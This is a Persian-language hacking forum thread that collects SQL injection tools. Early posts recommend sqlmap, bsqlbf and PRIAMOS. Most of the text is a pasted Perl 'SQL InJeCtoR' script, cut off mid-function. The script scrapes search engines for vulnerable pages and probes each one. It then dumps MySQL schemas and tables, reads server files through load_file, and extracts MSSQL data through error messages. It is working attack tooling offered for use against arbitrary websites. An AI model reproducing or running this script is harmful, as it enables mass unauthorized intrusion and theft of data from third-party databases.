IT Security Team  
راهنما تقویم جستجو ارسالهاي امروز نشانه گذاري انجمن ها به عنوان خوانده شده
بازگشت   IT Security Team > مقالات ، ابزارها و فیلم های آسیب پذیریهای Web Application > مباحث Sql Injection
بازنگری این صفحه مرجع ابزارهای SQL Injection



پاسخ
صفحه 1 از 4 1 234
 
LinkBack ابزارهای موضوع نحوه نمایش
قدیمی 10-11-2009, 12:02 AM   #1
مديريت كل سايت
 
M3hr@n.S آواتار ها
 
تاریخ عضویت: May 2009
نوشته ها: 160
Thanks: 206
Thanked 418 Times in 99 Posts
Yahoo1 مرجع ابزارهای SQL Injection
در این تاپیک سعی میشود ابزارهای SQL Injection معروف معرفی شود
دوستان هم کمک کنن تا این تاپیک به یکی از منابع ابزارهای SQLi تبدیل بشه

ممنون
__________________

لحظات را گذرانديم كه به خوشبختي برسيم ، غافل از اينكه لحظات همان خوشبختي اند .

M3hr@n.S آنلاین نیست.   پاسخ با نقل قول
The Following 12 Users Say Thank You to M3hr@n.S For This Useful Post:
blackmirror (12-05-2010), gemini103 (02-22-2012), h4ckrout (10-11-2009), HackerGharb (11-04-2011), homay (06-16-2011), saeedhunter (04-09-2012), skyhack (05-30-2010), stillbirth (03-05-2011), takbir (02-14-2011), vmbi (11-08-2010), zarbat (03-27-2012), zh4d0w (04-10-2012)
قدیمی 10-11-2009, 12:13 AM   #2
مديريت كل سايت
 
M3hr@n.S آواتار ها
 
تاریخ عضویت: May 2009
نوشته ها: 160
Thanks: 206
Thanked 418 Times in 99 Posts
پیش فرض ابزار Sqlmap
یکی از بهترین ابزارها جهت بیرون کشیدن دیتا از Databaseهای MySQL – Oracle – PostgreSQL - Microsoft SQL هستش و کار injection رو خیلی راحت میکنه
open source و با Python نوشته شده و قابل استفاده در سیستم عامل های مختلف نیز میباشد

برای دریافت برنامه و سورس و همچنین اطلاعات دقیقتر به اینجا مراجعه کنید.

موفق باشید
__________________

لحظات را گذرانديم كه به خوشبختي برسيم ، غافل از اينكه لحظات همان خوشبختي اند .

M3hr@n.S آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to M3hr@n.S For This Useful Post:
saeedhunter (02-11-2011), zarbat (03-27-2012), zh4d0w (04-10-2012)
قدیمی 10-11-2009, 05:32 PM   #3
مديريت انجمن
 
homay آواتار ها
 
تاریخ عضویت: Jun 2009
نوشته ها: 368
Thanks: 438
Thanked 346 Times in 169 Posts
پیش فرض bsqlbf-v2.1
این tools برای Blind خیلی مناسبه
قبلا پست داده بودم

DataBaseهای زیر را ساپورت میکنه :
MS-SQL
MYSQL
POSTGRES
ORACLE

فیلم ها ، داکیومنتها و ابزارهای Blind Sql Injection
ویرایش توسط homay : 07-07-2010 در ساعت 11:20 AM
homay آنلاین نیست.   پاسخ با نقل قول
The Following 5 Users Say Thank You to homay For This Useful Post:
Neo_unique (12-17-2011), saeedhunter (02-11-2011), takbir (02-14-2011), zarbat (03-27-2012), zh4d0w (04-10-2012)
قدیمی 10-11-2009, 06:59 PM   #4
عضو جديد
 
h4ckrout آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 44
Thanks: 51
Thanked 23 Times in 14 Posts
پیش فرض
ممنون از مهران جان عزیز
که این تاپیک مهم را باز کردند خوب ما هم سعی میکنیم تا ابزار های مهم و بهتری را برای دوستان بزاریم تا مورد عنایت قرار بگیریم
این برنامه که با نام PRIAMOS مشهور هست که یک محیط گرافیکی دارد برای بیرون کشیدن اطلاعات از هدف خودمون که دیتابس اش را برای ما میاره table ها و...
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
__________________
P00y4 D!g!t4l $3cur!ty gr0up
h4ckrout آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to h4ckrout For This Useful Post:
Neo_unique (12-17-2011), saeedhunter (02-11-2011), zh4d0w (04-10-2012)
قدیمی 10-11-2009, 10:38 PM   #5
عضو فعال
 
hadi85 آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 160
Thanks: 35
Thanked 150 Times in 75 Posts
پیش فرض
نقل قول:
نوشته اصلی توسط h4ckrout نمایش پست ها
ممنون از مهران جان عزیز
که این تاپیک مهم را باز کردند خوب ما هم سعی میکنیم تا ابزار های مهم و بهتری را برای دوستان بزاریم تا مورد عنایت قرار بگیریم
این برنامه که با نام priamos مشهور هست که یک محیط گرافیکی دارد برای بیرون کشیدن اطلاعات از هدف خودمون که دیتابس اش را برای ما میاره table ها و...
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
لینک دانلود اشکال داره
اگه کمی توضیح هم در مورد این ابزارها بدید خیلی خوب میشه

ممنون
ویرایش توسط hadi85 : 10-11-2009 در ساعت 10:51 PM
hadi85 آنلاین نیست.   پاسخ با نقل قول
قدیمی 10-12-2009, 12:05 AM   #6
عضو جديد
 
h4ckrout آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 44
Thanks: 51
Thanked 23 Times in 14 Posts
پیش فرض
دوست عزیز لینک مشکلی ندارد مدیران عزیز هم یک تستی بزنن ببینند که مشکل داره یا نه برای من که مشکل نداره
در مورد سوال دوم هم دوست گرامی ما سعی میکنیم یعنی من و مدیران عزیز در حد توانمان توضیح بدیم ولی باید یکم هم خودتت روشون کار کنی
خوب ما در این تایپیک پست هایی میزاریم که در حملات sqlکاربرد داره مثلا ابزار تست حملات اس گیو ال روی هدف
که اگر میخواهی اطلاعات بیشتری کسب کنی میتونی به بخش مقالات مراجعه کنی یا گوگل خوب ابزاری که گذاشتم
یک Autoاینجکت هست که بعد از دادن هدف شروع میکنه به دادن اطلاعات دیتابیس که مثلا اگر با اکسس یا اس گیوال آشنا باشی تیبل...هست که اطلاعات ما میباشد
اگر متوجه نشدی بگو تا بهتر وخوب برات توضیح بدم
__________________
P00y4 D!g!t4l $3cur!ty gr0up
h4ckrout آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to h4ckrout For This Useful Post:
hadi85 (10-12-2009), saeedhunter (04-09-2012), zarbat (03-27-2012)
قدیمی 10-12-2009, 12:08 AM   #7
عضو فعال
 
hadi85 آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 160
Thanks: 35
Thanked 150 Times in 75 Posts
پیش فرض
ممنون الان تونستم دانلود کنم
hadi85 آنلاین نیست.   پاسخ با نقل قول
قدیمی 10-17-2009, 04:12 PM   #8
777
مديريت انجمن
 
777 آواتار ها
 
تاریخ عضویت: May 2009
نوشته ها: 202
Thanks: 34
Thanked 276 Times in 109 Posts
پیش فرض
يك Injector به زبان perl هم براي SQLi وهم براي MySQLi









کد:
#!/usr/bin/perl
#
# OOO  OOO           OO    OO        OO
#  OO   O             O     O         O
#  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO
#  O  O O   O   O     O     O        OOO    OO     OOOOOO       O
#  O   OO   O   O     O     O       O   O   O      O       OOOOOO
# OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO
################################################################################################################################
#                                             SQL INJECTOR 
################################################################################################################################

#proxy support
#URl Extractor + vuln scanner & checker



use LWP::UserAgent;
use HTTP::Request;

sub help
{
     system('cls');
     system('title SQL InJeCtoR v2.0');
     print "\n\n-----------------------------------\n";
     print "[!] Usage : perl $0 <option>\n";
     print "\n\n--/// MySQL\n";
     print "     --mysqlcol         MySQL column length calculator            MySQL v4/5\n";
     print "     --mysqldetails     MySQL target website db global infos      MySQL v4/5\n";
     print "     --mysqlschema      MySQL Full Schema Extractor               MySQL v5\n";
     print "     --mysqldump        MySQL Data Dump                           MySQL v4/5\n";
     print "     --mysqlfile        MySQL load_file fuzzer                    MySQL v4/5\n";
     print "     --mysqltblfuzz     MySQL Table_name Fuzzer                   MySQL v4\n";
     print "     --mysqlcolfuzz     MySQL Column_name Fuzzer                  MySQL v4\n";
	 print "\n\n--/// MsSQL\n";
	 print "     --mssqldetails      MsSQL DB global info\n";
	 print "     --mssqltable        MsSQL Tables Extractor\n";
	 print "     --mssqlcolumns      MsSQL Columns Extractor\n";
	 print "     --mssqldump         MsSQL Columns Extractor\n";
	 print "\n\n--/// Vulunerability Scanner\n";
	 print "     --dork              URL Extractor , SQL Vulnerability's Scanner & checker\n";
	 print "\n\n--/// Options\n";
	 print "     --proxy             define a proxy to use\n";
	 print "     --listfile          list of columns or tables to use in fuzz or load_file files list\n";
	 print "     --output            save injection or scan result in an outside file\n";
	 print "     --table             table to use in dumping data or in tbles extract\n";
	 print "     --column            column to use in dumping data or in column extract\n";
	 print "     --help              print this help text :P\n";
     exit();
}

sub variables
{
     my $i=0;
     foreach (@ARGV)
     {
         if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--help"){&help}
         $i++;
     }
}

sub main
{
     system('cls');
     system('title SQL InJeCtoR');
	 if (@ARGV<1){print "[!] For Help : perl $0 --help\n\n\n" ;}
}

sub vulnscanner
{
     checkgoogle();
     googlescan($search_dork);
     askscan($search_dork);
}

sub checkgoogle
{
	 my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
     my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->request($request) ;
     my $result    = $response->content;
	 if ($result   =~ m/if you suspect that your computer or network has been infected/i){print "[!] You Have Been Banned From Google Search :( \n";exit()}
}		 

sub googlescan
{
     my $dork  = $_[0];
     for ($i=0;$i<200;$i=$i+10)
     {
         my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=$i");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
	     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
		 {
		     print "[!] Trying to fuzz $1\n";	 
		     checkvuln($1)
		 }
     }				  
}

sub askscan
{
     my $dork  = $_[0];
     for ($i=0;$i<20;$i++)
     {
         my $request   = HTTP::Request->new(GET => "http://www.ask.com/web?q=page.php?id=&qsrc=0&o=0&l=dir&q=$dork&page=$i&jss=");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
		 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
		 {
			 my $askurl ="http://".$3 ;
			 print "[!] Trying to fuzz $askurl\n";
			 checkvuln($askurl);
		 }
	 }
}

sub checkvuln
{
     my $scan_url   = $_[0];
     my $link       = $scan_url.'0+order+by+9999999--';
	 my $ua         = LWP::UserAgent->new();
	 $ua->proxy("http", "http://$proxy/") if defined($proxy);
     my $req        = $ua->get($link);
	 my $fuzz       = $req->content;
	 if ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i )
	 {
	     print "[!] MySQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mysqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/ODBC SQL Server Driver/i)
	 {
	     print "[!] MsSQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mssqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/Microsoft JET Database/i || $fuzz =~ m/ODBC Microsoft Access Driver/i )
	 {
	     print "[!] MS Access Vulnerable -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@accessvuln,"$scan_url\n");
		 }
	 }
}

sub mysqlcount
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $null   = "09+and+1=" ;
     my $code   = "0+union+select+" ;
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $injection = $site.$null.$code."0",$com ;
     my $useragent = LWP::UserAgent->new();
	 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->get($injection);
     my $result   = $response->content;
     if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
     {
          print "\n[!] This Website Is Vulnerable\n" ;
	      print "[+] Working On It\n";
     }
     else
     {
         print "\n[!] This WebSite Is Not SQL Vulnerable !\n";
         exit();
     }
     for ($i = 0 ; $i < 100 ; $i ++)
     {
	     $col.=','.$i;
	     $specialword.=','."0x617a38387069783030713938";
         if ($i == 0)
         {
             $specialword = '' ; 
             $col = '' ;
         }
         $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
	     $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     $rq = $ua->get($sql);
		 $response = $rq->content;
	     if($response =~ /az88pix00q98/)
         {
             $i ++;			 
             print "\n[!] MySQL Column Count Finished\n" ;
             print "[!] This WebSite Have $i Columns\n" ;
             $sql=$site.$null.$code."0".$col.$com ;
		     print "=> ".$sql ."\n\n";	
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "Target Host : $site\n";
                 print vuln_file "Evasion     : $ev\n";
                 print vuln_file "Col length  : $i\n";
                 print vuln_file "Injection   : $sql\n";
                 close(vuln_file);
                 print "[+] Result Saved to $vulnfile\n";
			 }
             exit () ;		 
         }	
     }
}

sub mysqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
     print "\n[+] Info Getting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
         my $newlink = $1.$selection.$2.$com;
         my $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     my $request = $ua->get($newlink);
	     my $content = $request->content;
         if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
         {
	         print "[!] Database Version  : $1\n";
             print "[!] Database Name     : $2\n";						  
             print "[!] DB UserName       : $3\n";						  
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "[!] Target            : $site\n";
                 print vuln_file "[!] evasion           : $ev\n";
                 print vuln_file "[!] Database Version  : $1\n";
                 print vuln_file "[!] Database Name     : $2\n";
                 print vuln_file "[!] DB UserName       : $3\n";
                 close(vuln_file);
                 print "\n[+] Result Saved to $vulnfile\n";
			 }
             exit () ;			 
		 }
		 else
		 {
		     print "[!] Failed\n";
			 exit () ;	
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlschema
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my @schema=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
     print "\n[+] Schema Extracting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Column :|: Table :|: Database\n"; 
         for ($i=0;  $i<=1500 ; $i++ )
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 :|: $2 :|: $3 \n";
				 push (@schema,"$1 :|: $2 :|: $3 \n");
		     }
	     }
		 if (defined($vulnfile))
		 {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Schema  :: ----     \n\n\n";
		     $i=0;
		     foreach(@schema)
		     {
                 print vuln_file $schema[$i]."\n";
			     $i++;
		     }
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqldump
{
     my $site   = $_[0];
     my $colm   = $_[1];
     my $tble   = $_[2];
     my $ev     = $_[3];
	 print "[+] Table name $tble\n";
	 print "[+] Column name $colm\n";
	 my @dumper=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,$colm,0x617a38387069783030713938)";
     print "\n[+] Data Dump Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
	     $i=0;
		 print "[+] Dumped Data : //// \n"; 
         do
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 \n";
                 push(@dumper,"$1\n");
		     }
			 $i++;
	     }
		 while ($i<1500);
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Dumped Column     : $colm\n";
             print vuln_file "[!] Dumped Table      : $tble\n";
             print vuln_file "[!] Data  :: ----     \n\n\n";
		     $i=0;
		     foreach(@dumper)
		     {
                 print vuln_file $dumper[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzztable
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @tbles_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Table, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Table_name with $word_list_search[$i]";
	         $newstring = $1."0x617a38387069783030713938".$2.$add.'from'.$add.$word_list_search[$i].$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] Found Table ! $word_list_search[$i] \n";
                 push(@tbles_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Tbles Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@tbles_possible)
		     {
                 print vuln_file $tbles_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzzcolumn
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 my $tablext = $_[3];
	 print "[+] File List $filelst\n";
	 print "[+] Table To Fuzz Columns $tablext\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Column, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Column_name with $word_list_search[$i]";
	         $newstring = $1."concat(0x617a38387069783030713938,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] File Column ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Cols Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfile
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] File Fuzz, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
	         $newstring = $1."concat(0x617a38387069783030713938,load_file('$word_list_search[$i]'))".$2.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
			 print "[!] Trying To Fuzz Load_File with $word_list_search[$i]";
             if ($content =~ m/az88pix00q/i)
             { 
				 print "\n[!] Found File ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Files Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mssqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Getting Infos, Started Please Wait ....\n\n";
     $version = "convert(int,(select".$add."\@\@version));--" ;
     $system_user = 'convert(int,(select'.$add.'system_user));--';
     $db_name = 'convert(int,(select'.$add.'db_name()));--';
     $servername = 'convert(int,(select'.$add.'@@servername));--' ;
     my $injection = $site.$version ;
     my $request   = HTTP::Request->new(GET=>$injection);
     my $useragent = LWP::UserAgent->new();
     $useragent->timeout(10);
     my $response  = $useragent->request($request)->as_string ;
     if ($response =~ /.*?value\s'/)
	 {
	     print "[+] This Website Is SQL Vulnerable ..\n";
	     print "[+] Working On It ..\n";
         $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
	     print "\n[!] MsSQL Version Is :";
	     print "\n\n => $ver"	;
	     my $injection = $site.$system_user ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL System_User Is    :";
	     print "  $system_user  "	;
         my $injection = $site.$db_name ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Database Name Is  :";
	     print "  $db_name  "	;		  
	     my $injection = $site.$servername ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Server Name Is    :";
	     print "  $servername  "	;	
         exit ();					   
	 }
	 else 
	 {
	     system ("cls");
	     print "\n[!] This Website Is Not SQL Vulnerable !";
	     exit();
	}
}

sub mssqltable
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
     $data = "'Ws65qd798sqd9878'";
	 print "[!] Tables : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@exttbles,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@exttbles)
		 {
             print vuln_file $exttbles[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
